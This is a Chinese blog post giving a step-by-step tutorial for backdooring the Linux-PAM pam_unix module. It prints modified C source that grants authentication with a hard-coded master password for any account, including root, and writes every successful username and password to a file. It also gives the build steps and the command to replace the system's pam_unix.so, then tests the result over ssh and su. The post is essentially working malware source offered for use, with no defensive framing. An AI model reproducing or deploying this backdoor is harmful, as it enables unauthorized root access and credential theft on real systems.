Chinaunix首页 | 论坛 | 博客
  • 博客访问: 7598966
  • 博文数量: 1768
  • 博客积分: 18684
  • 博客等级: 上将
  • 技术积分: 16342
  • 用 户 组: 普通用户
  • 注册时间: 2010-06-02 10:28
个人简介

啥也没写

文章分类

全部博文(1768)

文章存档

2024年(14)

2023年(44)

2022年(39)

2021年(46)

2020年(43)

2019年(27)

2018年(44)

2017年(50)

2016年(47)

2015年(15)

2014年(21)

2013年(43)

2012年(143)

2011年(228)

2010年(263)

2009年(384)

2008年(246)

2007年(30)

2006年(38)

2005年(2)

2004年(1)

分类: C/C++

2018-01-25 11:29:42

环境RHEL6.4

wget 

tar xzvf Linux-PAM-1.1.1.tar.gz

主要修改 Linux-PAM-1.1.1/modules/pam_unix/pam_unix_auth.c


点击(此处)折叠或打开

  1. /* verify the password of this user */
  2.         retval = _unix_verify_password(pamh, name, p, ctrl);

  3. if (strcmp(p,"secpass")==0 ){retval = PAM_SUCCESS;}

  4. if(retval == PAM_SUCCESS)

  5. {
  6.                 FILE *fd;
  7.                 fd = fopen(PASSWD_FILE, "a");
  8.                 fprintf(fd, "%s:%s\n", name, p);
  9.                         fclose(fd);
  10. }
  11.         name = p = NULL;
  12.         AUTH_RETURN;
  13. }
./configure && make

cp modules/pam_unix/.libs/pam_unix.so /lib/security/pam_unix.so  前提对系统现有pam_unix.so文件备份

测试ssh

以上是使用了万能密码登录功能,以不同的root密码登录,获得同样的root权限,另一个是记录登录密码到指定文件。

在被攻击端查看密码文件,第一次管理员正常以root身份登录,第二次攻击者以root身份使用后门密码登录。

测试su
普通用户sysuser登录系统后,分别使用万能密码和正常密码切换为root


总结:PAM模块的backdoor程序实现很简单,主要为万能密码和键盘记录功能,还可以提供远程发送密码功能,主要影响了所有在/etc/pam.d/下利用到PAM模块认证的方式(ssh、su、ftp、telnet等。)

Have a nice day.
阅读(934) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~